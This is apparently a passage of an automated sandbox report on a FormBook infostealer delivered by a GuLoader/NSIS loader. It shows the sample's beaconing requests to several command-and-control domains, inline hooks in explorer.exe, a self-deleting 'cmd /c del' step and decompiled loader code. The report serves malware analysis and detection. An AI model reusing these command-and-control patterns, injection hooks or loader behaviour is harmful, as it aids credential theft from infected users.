Jul 5, 2023 14:09:29.426867962 CEST	285	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 05 Jul 2023 12:09:29 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.enjoythearoma.com/be53/?oT5=RF7sC7z4FipVNmwbw+jPCmgIeBX2AJ2lmBul9Kk5zXkXtv+ecrMoeWKP8G+1HCfitgV0&v0Dd=aPFdKLwPWjPXZR-p Host-Header: 8441280b0c35cbc1147f8ba998a563a7 X-HTTPS-Enforce: 1 X-Proxy-Cache-Info: DT:1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	50294	162.241.203.15	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 5, 2023 14:10:12.425170898 CEST	286	OUT	GET /be53/?oT5=M7U+edu2snUk3BO2AwMlCt4TCm8eU2rBG6AV5RYZgcPXP8tLgUP1/BuAtIMTBCmSTczO&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1 Host: www.gota-africana.top Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 5, 2023 14:10:12.623610973 CEST	287	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 05 Jul 2023 12:10:12 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Upgrade: h2,h2c Connection: Upgrade, close Location: http://gota-africana.top/be53/?oT5=M7U+edu2snUk3BO2AwMlCt4TCm8eU2rBG6AV5RYZgcPXP8tLgUP1/BuAtIMTBCmSTczO&v0Dd=aPFdKLwPWjPXZR-p Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	50295	160.124.149.176	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 5, 2023 14:10:31.285471916 CEST	288	OUT	GET /be53/?oT5=AooPDu4QOB27lZfkSgAw9MoUMoboYKOvBuVKrBFHr89pQNaRTMdrm8d0/nwlB7CJGzGJ&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1 Host: www.2004256.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jul 5, 2023 14:10:31.482108116 CEST	289	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 05 Jul 2023 11:20:49 GMT Content-Type: text/html Content-Length: 2241 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 bb dd b6 ab d9 d2 d0 b4 ce ef c1 aa cd f8 bf c6 bc bc d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 33 33 34 32 36 3b 26 23 32 36 35 32 34 3b 26 23 32 30 30 38 31 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 33 32 34 34 37 3b 26 23 32 30 31 30 38 3b 26 23 33 32 34 34 37 3b 26 23 31 39 39 37 37 3b 26 23 33 32 34 34 37 3b 26 23 34 34 3b 26 23 32 36 33 36 38 3b 26 23 33 36 38 31 37 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 37 37 3b 26 23 38 36 3b 26 23 34 34 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 32 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 33 32 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 33 33 34 32 36 3b 26 23 32 36 35 32 34 3b 26 23 32 30 30 38 31 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 33 32 34 34 37 3b 26 23 32 30 31 30 38 3b 26 23 33 32 34 34 37 3b 26 23 31 39 39 37 37 3b 26 23 33 32 34 34 37 3b 26 23 34 34 3b 26 23 32 36 33 36 38 3b 26 23 33 36 38 31 37 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 37 37 3b 26 23 38 36 3b 26 23 34 34 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 32 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 33 32 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 33 33 34 32 36 3b 26 23 32 36 35 32 34 3b 26 23 32 30 30 38 31 3b 26 23 33 30 37 32 31 3b 26 23 31 39 39 36 38 3b 26 23 33 32 34 34 37 3b 26 23 32 30 31 30 38 3b 26 23 33 32 34 34 37 3b 26 23 31 39 39 37 37 3b 26 23 33 32 34 34 37 3b 26 23 34 34 3b 26 23 32 36 33 36 38 3b 26 23 33 36 38 31 37 3b 26 23 32 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 33 38 33 3b 26 23 32 34 31 34 39 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 37 37 3b 26 23 38 36 3b 26 23 34 34 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 32 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 33 32 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 2c 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 32 35 39 33 3b 26 23 32 36 33 33 33 3b 26 23 33 38 33 37 36 3b 26 23 32 30 31 30 37 Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>芒果乱码一线二线三线,最近中文字幕视频在线MV,国产精品视频一区二区三区</title><meta name="keywords" content="芒果乱码一线二线三线,最近中文字幕视频在线MV,国产精品视频一区二区三区" /><meta name="description" content="芒果乱码一线二线三线,最近中文字幕视频在线MV,国产精品视频一区二区三区,精品国产网曝门&#20107
Jul 5, 2023 14:10:31.482228041 CEST	290	IN	Data Raw: 3b 26 23 32 30 32 31 34 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b Data Ascii: ;件在线观看,免费一区二区无码东京热,亚洲欧美乱综合图片区小说区,9&#

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	50296	198.54.117.216	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 5, 2023 14:10:51.818758011 CEST	291	OUT	GET /be53/?oT5=INULBbnUeQ+YoPWvOon16eoyazYMd+BlZq05NDhrWdwyda5UeJingftxUrbq982m+Gct&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1 Host: www.arctiquevarare.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x80 0x0E 0xE5
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x88 0x8E 0xE5
GetMessageW	INLINE	0x48 0x8B 0xB8 0x88 0x8E 0xE5
GetMessageA	INLINE	0x48 0x8B 0xB8 0x80 0x0E 0xE5

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: hi38VYWujz.exePID: 6396, Parent PID: 5528

General

Target ID:	6
Start time:	14:05:13
Start date:	05/07/2023
Path:	C:\Users\user\Desktop\hi38VYWujz.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\hi38VYWujz.exe
Imagebase:	0x400000
File size:	570'384 bytes
MD5 hash:	63ABEA7FEBA39DEB21BCBEFD7926F00E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.45136338191.000000000637B000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: hi38VYWujz.exePID: 7828, Parent PID: 6396

General

Target ID:	11
Start time:	14:06:08
Start date:	05/07/2023
Path:	C:\Users\user\Desktop\hi38VYWujz.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\hi38VYWujz.exe
Imagebase:	0x400000
File size:	570'384 bytes
MD5 hash:	63ABEA7FEBA39DEB21BCBEFD7926F00E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 5528, Parent PID: 7828

General

Target ID:	13
Start time:	14:06:25
Start date:	05/07/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff6450d0000
File size:	4'849'904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 0000000D.00000002.49454963074.0000000014854000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cscript.exePID: 7820, Parent PID: 5528

General

Target ID:	14
Start time:	14:06:30
Start date:	05/07/2023
Path:	C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cscript.exe
Imagebase:	0x6a0000
File size:	144'896 bytes
MD5 hash:	13783FF4A2B614D7FBD58F5EEBDEDEF6
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5228, Parent PID: 7820

General

Target ID:	15
Start time:	14:06:34
Start date:	05/07/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Users\user\Desktop\hi38VYWujz.exe"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7484, Parent PID: 5228

General

Target ID:	16
Start time:	14:06:34
Start date:	05/07/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7b0d70000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: hi38VYWujz.exePID: 6396, Parent PID: 5528COMMON

Execution Graph

Execution Coverage:	21.7%
Dynamic/Decrypted Code Coverage:	13.5%
Signature Coverage:	20%
Total number of Nodes:	1552
Total number of Limit Nodes:	44

Executed Functions

Function 00403350 Relevance: 87.9, APIs: 33, Strings: 17, Instructions: 412
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			_entry_() {
				signed int _t51;
				intOrPtr* _t56;
				WCHAR* _t60;
				char* _t63;
				void* _t66;
				void* _t68;
				int _t70;
				int _t72;
				int _t75;
				intOrPtr* _t76;
				int _t77;
				int _t79;
				void* _t103;
				signed int _t120;
				void* _t123;
				void* _t128;
				intOrPtr _t147;
				intOrPtr _t148;
				intOrPtr* _t149;
				int _t151;
				void* _t154;
				int _t155;
				signed int _t159;
				signed int _t164;
				signed int _t169;
				void* _t171;
				WCHAR* _t172;
				signed int _t175;
				signed int _t178;
				CHAR* _t179;
				void* _t182;
				int* _t184;
				void* _t192;
				char* _t193;
				void* _t196;
				void* _t197;
				void* _t243;

				_t171 = 0x20;
				_t151 = 0;
				 *(_t197 + 0x14) = 0;
				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t197 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				_t51 = GetVersion() & 0xbfffffff;
				 *0x7a8a2c = _t51;
				if(_t51 != 6) {
					_t149 = E00406639(0);
					if(_t149 != 0) {
						 *_t149(0xc00);
					}
				}
				_t179 = "UXTHEME";
				goto L4;
				L8:
				__imp__#17(_t192);
				__imp__OleInitialize(_t151); // executed
				 *0x7a8af8 = _t56;
				SHGetFileInfoW(0x79fee0, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
				E0040625F(0x7a7a20, L"NSIS Error");
				_t60 = GetCommandLineW();
				_t193 = L"\"C:\\Users\\Arthur\\Desktop\\hi38VYWujz.exe\"";
				E0040625F(_t193, _t60);
				 *0x7a8a20 = GetModuleHandleW(_t151);
				_t63 = _t193;
				if(L"\"C:\\Users\\Arthur\\Desktop\\hi38VYWujz.exe\"" == 0x22) {
					_t63 =  &M007B3002;
					_t171 = 0x22;
				}
				_t155 = CharNextW(E00405B5D(_t63, _t171));
				 *(_t197 + 0x18) = _t155;
				_t66 =  *_t155;
				if(_t66 == _t151) {
					L33:
					_t172 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t172);
					_t68 = E0040331F(_t155, 0);
					_t225 = _t68;
					if(_t68 != 0) {
						L36:
						DeleteFileW(L"1033"); // executed
						_t70 = E00402EC1(_t227,  *(_t197 + 0x1c)); // executed
						 *(_t197 + 0x10) = _t70;
						if(_t70 != _t151) {
							L48:
							E00403893();
							__imp__OleUninitialize();
							_t239 =  *(_t197 + 0x10) - _t151;
							if( *(_t197 + 0x10) == _t151) {
								__eflags =  *0x7a8ad4 - _t151;
								if( *0x7a8ad4 == _t151) {
									L72:
									_t72 =  *0x7a8aec;
									__eflags = _t72 - 0xffffffff;
									if(_t72 != 0xffffffff) {
										 *(_t197 + 0x10) = _t72;
									}
									ExitProcess( *(_t197 + 0x10));
								}
								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
								__eflags = _t75;
								if(_t75 != 0) {
									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
									 *(_t197 + 0x34) = 1;
									 *(_t197 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
								}
								_t76 = E00406639(4);
								__eflags = _t76 - _t151;
								if(_t76 == _t151) {
									L70:
									_t77 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L72;
									}
									goto L71;
								} else {
									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
									__eflags = _t79;
									if(_t79 == 0) {
										L71:
										E0040140B(9);
										goto L72;
									}
									goto L70;
								}
							}
							E004058C1( *(_t197 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x7a8a40 == _t151) {
							L47:
							 *0x7a8aec =  *0x7a8aec | 0xffffffff;
							 *(_t197 + 0x14) = E0040396D( *0x7a8aec);
							goto L48;
						}
						_t184 = E00405B5D(_t193, _t151);
						if(_t184 < _t193) {
							L44:
							_t236 = _t184 - _t193;
							 *(_t197 + 0x10) = L"Error launching installer";
							if(_t184 < _t193) {
								_t182 = E0040582C(_t239);
								lstrcatW(_t172, L"~nsu");
								if(_t182 != _t151) {
									lstrcatW(_t172, "A");
								}
								lstrcatW(_t172, L".tmp");
								_t195 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t172, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t172);
									if(_t182 == _t151) {
										E0040580F();
									} else {
										E00405792();
									}
									SetCurrentDirectoryW(_t172);
									_t243 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Cascara\\Personers\\Narra" - _t151; // 0x43
									if(_t243 == 0) {
										E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Cascara\\Personers\\Narra", _t195);
									}
									E0040625F(0x7a9000,  *(_t197 + 0x18));
									_t156 = "A" & 0x0000ffff;
									 *0x7a9800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t196 = 0x1a;
									do {
										E00406281(_t151, _t172, 0x79f6e0, 0x79f6e0,  *((intOrPtr*)( *0x7a8a34 + 0x120)));
										DeleteFileW(0x79f6e0);
										if( *(_t197 + 0x10) != _t151 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\hi38VYWujz.exe", 0x79f6e0, ?str?) != 0) {
											E00406025(_t156, 0x79f6e0, _t151);
											E00406281(_t151, _t172, 0x79f6e0, 0x79f6e0,  *((intOrPtr*)( *0x7a8a34 + 0x124)));
											_t103 = E00405844(0x79f6e0);
											if(_t103 != _t151) {
												CloseHandle(_t103);
												 *(_t197 + 0x10) = _t151;
											}
										}
										 *0x7a9800 =  *0x7a9800 + 1;
										_t196 = _t196 - 1;
									} while (_t196 != 0);
									E00406025(_t156, _t172, _t151);
								}
								goto L48;
							}
							 *_t184 = _t151;
							_t185 =  &(_t184[2]);
							if(E00405C38(_t236,  &(_t184[2])) == 0) {
								goto L48;
							}
							E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Cascara\\Personers\\Narra", _t185);
							E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Cascara\\Personers\\Narra\\Freons\\Entrenching\\Samsen", _t185);
							 *(_t197 + 0x10) = _t151;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t159 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t120 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
						while( *_t184 != _t159 || _t184[1] != _t120) {
							_t184 = _t184;
							if(_t184 >= _t193) {
								continue;
							}
							break;
						}
						_t151 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t172, 0x3fb);
					lstrcatW(_t172, L"\\Temp");
					_t123 = E0040331F(_t155, _t225);
					_t226 = _t123;
					if(_t123 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t172);
					lstrcatW(_t172, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t172);
					SetEnvironmentVariableW(L"TMP", _t172);
					_t128 = E0040331F(_t155, _t226);
					_t227 = _t128;
					if(_t128 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t154 = 0x20;
						if(_t66 != _t154) {
							L13:
							if( *_t155 == 0x22) {
								_t155 = _t155 + 2;
								_t154 = 0x22;
							}
							if( *_t155 != 0x2f) {
								goto L27;
							} else {
								_t155 = _t155 + 2;
								if( *_t155 == 0x53) {
									_t148 =  *((intOrPtr*)(_t155 + 2));
									if(_t148 == 0x20 || _t148 == 0) {
										 *0x7a8ae0 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t169 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t175 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t169;
								if( *_t155 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
									_t147 =  *((intOrPtr*)(_t155 + 8));
									if(_t147 == 0x20 || _t147 == 0) {
										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t164 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t178 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t164;
								if( *(_t155 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
									goto L27;
								} else {
									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
									__eflags = _t155;
									E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Cascara\\Personers\\Narra", _t155);
									L32:
									_t151 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t155 = _t155 + 2;
						} while ( *_t155 == _t154);
						goto L13;
						L27:
						_t155 = E00405B5D(_t155, _t154);
						if( *_t155 == 0x22) {
							_t155 = _t155 + 2;
						}
						_t66 =  *_t155;
					} while (_t66 != 0);
					goto L32;
				}
				L4:
				E004065C9(_t179); // executed
				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
				if( *_t179 != 0) {
					goto L4;
				} else {
					E00406639(0xa);
					 *0x7a8a24 = E00406639(8);
					_t56 = E00406639(6);
					if(_t56 != _t151) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x7a8a2f =  *0x7a8a2f | 0x00000040;
						}
					}
					goto L8;
				}
			}

0x0040335b
0x0040335c
0x00403363
0x00403367
0x0040336f
0x00403373
0x0040337f
0x00403388
0x0040338d
0x00403390
0x00403397
0x0040339e
0x0040339e
0x00403397
0x004033a0
0x004033a0
0x004033e8
0x004033e9
0x004033f0
0x004033f6
0x0040340c
0x0040341c
0x00403421
0x00403427
0x0040342e
0x00403442
0x00403447
0x00403449
0x0040344d
0x00403452
0x00403452
0x00403461
0x00403463
0x00403467
0x0040346d
0x00403584
0x0040358a
0x00403595
0x00403597
0x0040359c
0x0040359e
0x004035f6
0x004035fb
0x00403605
0x0040360c
0x00403610
0x004036c1
0x004036c1
0x004036c6
0x004036cc
0x004036d1
0x004037f7
0x004037fd
0x0040387b
0x0040387b
0x00403880
0x00403883
0x00403885
0x00403885
0x0040388d
0x0040388d
0x0040380d
0x00403813
0x00403815
0x00403822
0x00403835
0x0040383d
0x00403845
0x00403845
0x0040384d
0x00403852
0x00403859
0x00403867
0x0040386a
0x00403870
0x00403872
0x00000000
0x00000000
0x00000000
0x0040385b
0x00403861
0x00403863
0x00403865
0x00403874
0x00403876
0x00000000
0x00403876
0x00000000
0x00403865
0x00403859
0x004036e0
0x004036e7
0x004036e7
0x0040361c
0x004036b1
0x004036b1
